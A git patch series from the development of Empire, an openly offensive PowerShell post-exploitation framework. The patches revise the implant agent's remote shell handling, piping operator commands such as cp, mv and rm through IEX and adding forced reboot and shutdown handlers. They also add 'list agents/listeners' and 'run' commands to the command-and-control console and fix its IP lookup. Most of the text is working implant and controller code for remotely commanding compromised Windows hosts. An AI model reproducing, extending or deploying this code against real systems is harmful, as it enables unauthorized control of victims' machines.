-./empire --debug +# start up Empire +./empire From 804e1a01a2b013913dabe7ca3ce67c5ed168b38c Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Thu, 20 Aug 2015 15:32:26 -0400 Subject: [PATCH 06/11] Revamped basic shell operations in agent core (cp, dir, mv, etc.) Standardized UNC path normalization in agent core added hostname alias --- data/agent/agent.ps1 | 55 ++++++++++++++------------------------------ lib/common/empire.py | 2 +- 2 files changed, 18 insertions(+), 39 deletions(-) diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index fdb04aa..5cb1d55 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 @@ -239,9 +239,12 @@ function Invoke-Empire { function Invoke-ShellCommand { param($cmd, $cmdargs="") - if ($cmdargs.StartsWith("\\")) { - # UNC path normalization for PowerShell - $cmdargs = "FileSystem::$cmdargs" + # UNC path normalization for PowerShell + if ($cmdargs -like "*`"\\*") { + $cmdargs = $cmdargs -replace "`"\\","FileSystem::`"\" + } + elseif ($cmdargs -like "*\\*") { + $cmdargs = $cmdargs -replace "\\\\","FileSystem::\\" } $output = "" @@ -258,46 +261,18 @@ function Invoke-Empire { } else { try{ - $output = Get-ChildItem -force -path "$cmdargs" -ErrorAction Stop | select lastwritetime,length,name + $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop | select lastwritetime,length,name" } catch [System.Management.Automation.ActionPreferenceStopException] { $output = "[!] Error: $_ (or cannot be accessed)." } } } - '(rm|del|rmdir)' { + '(mv|move|copy|cp|rm|del|rmdir)' { if ($cmdargs.length -ne "") { try { - Remove-Item -Force -Recurse "$cmdargs" -ErrorAction Stop; - $output = "$cmdargs deleted" - } - catch { - $output=$_.Exception; - } - } - } - '(mv|move)' { - if ($cmdargs.length -ne "") { - try { - $parts = $cmdargs.split(" ") - $source = $parts[0..$($parts.length-2)] -join " " - $dest = $parts[-1] - Move-Item -LiteralPath $source -Destination $dest -Force -ErrorAction Stop - $output = "$source moved to $dest" - } - catch { - $output=$_.Exception; - } - } - } - '(copy|cp)' { - if ($cmdargs.length -ne "") { - try { - $parts = $cmdargs.split(" ") - $source = $parts[0..$($parts.length-2)] -join " " - $dest = $parts[-1] - Copy-Item -LiteralPath $source -Destination $dest -Force -ErrorAction Stop - $output = "$source copied to $dest" + IEX "$cmd $cmdargs -Force -ErrorAction Stop" + $output = "executed $cmd $cmdargs" } catch { $output=$_.Exception; @@ -306,8 +281,9 @@ function Invoke-Empire { } cd { if ($cmdargs.length -ne "") - { - cd $cmdargs + { + $cmdargs = $cmdargs.trim("`"").trim("'") + cd "$cmdargs" $output = pwd } } @@ -383,7 +359,10 @@ function Invoke-Empire { } else { $output = route $cmdargs } } - '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } + '(whoami|getuid)' { $output = [Security.Principal.WindowsIdentity]::GetCurrent().Name } + hostname { + $output = [System.Net.Dns]::GetHostByName(($env:computerName)) + } '(reboot|restart)' { Restart-Computer -force } shutdown { Stop-Computer -force } default { diff --git a/lib/common/empire.py b/lib/common/empire.py index 24ae92b..3c5e60a 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -1139,7 +1139,7 @@ class AgentMenu(cmd.Cmd): self.prompt = '(Empire: '+helpers.color(name, 'red')+') > ' # agent commands that have opsec-safe alises in the agent code - self.agentCommands = ["ls","dir","rm","del","cp","copy","pwd","cat","cd","mkdir","rmdir","mv","move","ipconfig","ifconfig","route","reboot","restart","shutdown","ps","tasklist","getpid","whoami","getuid"] + self.agentCommands = ["ls","dir","rm","del","cp","copy","pwd","cat","cd","mkdir","rmdir","mv","move","ipconfig","ifconfig","route","reboot","restart","shutdown","ps","tasklist","getpid","whoami","getuid","hostname"] # listen for messages from this specific agent dispatcher.connect( self.handle_agent_event, sender=dispatcher.Any) From 0e0c94b94aa8194134d68cdff1b1f3a749c7d929 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Thu, 20 Aug 2015 18:49:23 -0400 Subject: [PATCH 07/11] Aliased run for execute. --- lib/common/empire.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index 3c5e60a..307cefc 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -2397,6 +2397,11 @@ class ModuleMenu(cmd.Cmd): self.mainMenu.agents.save_agent_log(agentName, msg) + def do_run(self, line): + "Execute the given Empire module." + self.do_execute(line) + + def complete_set(self, text, line, begidx, endidx): "Tab-complete a module option to set." From 5b40197fd572e928b4624012f8318fa8d93c9971 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Thu, 20 Aug 2015 19:08:40 -0400 Subject: [PATCH 08/11] 'list [agents/listeners] ' should now be a universal option in every menu Added 'run' alias for 'execute' in listener menu as well. --- lib/common/empire.py | 153 ++++++++++++++++++++++++++++++------------- 1 file changed, 109 insertions(+), 44 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 307cefc..e6c3c25 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -501,6 +501,63 @@ class MainMenu(cmd.Cmd): self.modules.reload_module(line) + def do_list(self, line): + "Lists active agents or listeners." + + parts = line.split(" ") + + if parts[0].lower() == "agents": + + line = " ".join(parts[1:]) + agents = self.agents.get_agents() + + if line.strip().lower() == "stale": + + displayAgents = [] + + for agent in agents: + + sessionID = self.agents.get_agent_id(agent[3]) + + # max check in -> delay + delay*jitter + intervalMax = (agent[4] + agent[4] * agent[5])+30 + + # get the agent last check in time + agentTime = time.mktime(time.strptime(agent[16],"%Y-%m-%d %H:%M:%S")) + if agentTime < time.mktime(time.localtime()) - intervalMax: + # if the last checkin time exceeds the limit, remove it + displayAgents.append(agent) + + messages.display_staleagents(displayAgents) + + + elif line.strip() != "": + # if we're listing an agents active in the last X minutes + try: + minutes = int(line.strip()) + + # grab just the agents active within the specified window (in minutes) + displayAgents = [] + for agent in agents: + agentTime = time.mktime(time.strptime(agent[16],"%Y-%m-%d %H:%M:%S")) + + if agentTime > time.mktime(time.localtime()) - (int(minutes) * 60): + displayAgents.append(agent) + + messages.display_agents(displayAgents) + + except: + print helpers.color("[!] Please enter the minute window for agent checkin.") + + else: + messages.display_agents(agents) + + + elif parts[0].lower() == "listeners": + + messages.display_listeners(self.listeners.get_listeners()) + + def complete_usemodule(self, text, line, begidx, endidx): "Tab-complete an Empire PowerShell module path." @@ -624,50 +681,14 @@ class AgentsMenu(cmd.Cmd): def do_list(self, line): - "Lists all active agents." - - agents = self.mainMenu.agents.get_agents() - - if line.strip().lower() == "stale": - - displayAgents = [] - - for agent in agents: - - sessionID = self.mainMenu.agents.get_agent_id(agent[3]) - - # max check in -> delay + delay*jitter - intervalMax = (agent[4] + agent[4] * agent[5])+30 - - # get the agent last check in time - agentTime = time.mktime(time.strptime(agent[16],"%Y-%m-%d %H:%M:%S")) - if agentTime < time.mktime(time.localtime()) - intervalMax: - # if the last checkin time exceeds the limit, remove it - displayAgents.append(agent) - - messages.display_staleagents(displayAgents) - - - elif line.strip() != "": - # if we're listing an agents active in the last X minutes - try: - minutes = int(line.strip()) - - # grab just the agents active within the specified window (in minutes) - displayAgents = [] - for agent in agents: - agentTime = time.mktime(time.strptime(agent[16],"%Y-%m-%d %H:%M:%S")) - - if agentTime > time.mktime(time.localtime()) - (int(minutes) * 60): - displayAgents.append(agent) - - messages.display_agents(displayAgents) - - except: - print helpers.color("[!] Please enter the minute window for agent checkin.") + "Lists all active agents (or listeners)." + if line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) else: - messages.display_agents(agents) + self.mainMenu.do_list("agents " + str(line)) def do_rename(self, line): @@ -1226,6 +1247,17 @@ class AgentMenu(cmd.Cmd): cmd.Cmd.do_help(self, *args) + def do_list(self, line): + "Lists all active agents (or listeners)." + + if line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) + else: + print helpers.color("[!] Please use 'list [agents/listeners] '.") + + def do_rename(self, line): "Rename the agent." @@ -1911,8 +1943,14 @@ class ListenerMenu(cmd.Cmd): def do_list(self, line): - "List all active listeners." - messages.display_listeners(self.mainMenu.listeners.get_listeners()) + "List all active listeners (or agents)." + + if line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + else: + self.mainMenu.do_list("listeners " + str(line)) def do_back(self, line): @@ -1995,6 +2033,11 @@ class ListenerMenu(cmd.Cmd): self.mainMenu.listeners.add_listener_from_config() + def do_run(self, line): + "Execute a listener with the currently specified options." + self.do_execute(line) + + def do_agents(self, line): "Jump to the Agents menu." a = AgentsMenu(self.mainMenu) @@ -2225,6 +2268,17 @@ class ModuleMenu(cmd.Cmd): return True + def do_list(self, line): + "Lists all active agents (or listeners)." + + if line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) + else: + print helpers.color("[!] Please use 'list [agents/listeners] '.") + + def do_reload(self, line): "Reload the current module." @@ -2525,6 +2579,17 @@ class StagerMenu(cmd.Cmd): return True + def do_list(self, line): + "Lists all active agents (or listeners)." + + if line.lower().startswith("listeners"): + self.mainMenu.do_list("listeners " + str(" ".join(line.split(" ")[1:]))) + elif line.lower().startswith("agents"): + self.mainMenu.do_list("agents " + str(" ".join(line.split(" ")[1:]))) + else: + print helpers.color("[!] Please use 'list [agents/listeners] '.") + + def do_info(self, line): "Display stager options." messages.display_stager(self.stagerName, self.stager) From b434102f2c2275eaf2e56825014d8b0be3d3190c Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Fri, 21 Aug 2015 14:17:55 -0400 Subject: [PATCH 09/11] Error handling for issue #23 --- lib/common/helpers.py | 27 ++++++++++++++++----------- 1 file changed, 16 insertions(+), 11 deletions(-) diff --git a/lib/common/helpers.py b/lib/common/helpers.py index 483684b..e9b5654 100644 --- a/lib/common/helpers.py +++ b/lib/common/helpers.py @@ -361,17 +361,22 @@ def lhost(): )[20:24]) except IOError as e: return "" - ip = socket.gethostbyname(socket.gethostname()) - if ip.startswith("127.") and os.name != "nt": - interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"] - for ifname in interfaces: - try: - ip = get_interface_ip(ifname) - if ip != "": - break - except: - print "Unexpected error:", sys.exc_info()[0] - pass + try: + ip = socket.gethostbyname(socket.gethostname()) + if ip.startswith("127.") and os.name != "nt": + interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"] + for ifname in interfaces: + try: + ip = get_interface_ip(ifname) + if ip != "": + break + except: + print "Unexpected error:", sys.exc_info()[0] + pass + except: + print "Unexpected error:", sys.exc_info()[0] + pass + return ip From 54c7300998f13730f17ba3d270ee45bd9c28fa9e Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Fri, 21 Aug 2015 15:24:12 -0400 Subject: [PATCH 10/11] Tweaks to fix for issue #23 --- lib/common/helpers.py | 26 +++++++++++++++----------- 1 file changed, 15 insertions(+), 11 deletions(-) diff --git a/lib/common/helpers.py b/lib/common/helpers.py index e9b5654..6d297b0 100644 --- a/lib/common/helpers.py +++ b/lib/common/helpers.py @@ -361,22 +361,26 @@ def lhost(): )[20:24]) except IOError as e: return "" + + ip = "" try: ip = socket.gethostbyname(socket.gethostname()) - if ip.startswith("127.") and os.name != "nt": - interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"] - for ifname in interfaces: - try: - ip = get_interface_ip(ifname) - if ip != "": - break - except: - print "Unexpected error:", sys.exc_info()[0] - pass + except socket.gaierror: + pass except: print "Unexpected error:", sys.exc_info()[0] - pass + return ip + if (ip == "" or ip.startswith("127.")) and os.name != "nt": + interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"] + for ifname in interfaces: + try: + ip = get_interface_ip(ifname) + if ip != "": + break + except: + print "Unexpected error:", sys.exc_info()[0] + pass return ip From 4e9e0d0cb45db09106e7215140710cd07ab4d356 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Sun, 23 Aug 2015 17:18:13 -0400 Subject: [PATCH 11/11] Updated changelog. --- changelog | 2 ++ 1 file changed, 2 insertions(+) diff --git a/changelog b/changelog index b9ca12b..2fc51d2 100644 --- a/changelog +++ b/changelog @@ -3,6 +3,8 @@ -Continued porting native shell commands to WMI replacents in agent core -In agent menu, 'shell CMD' now runs straight IEX CMD, and 'help agentcmds' shows safe aliases -Modified ./setup/reset.sh to work from parent or ./setup/ folders +-Agent core functions streamlined +-"list [agents/listeners] " should now be a global command 8/19/2015 ---------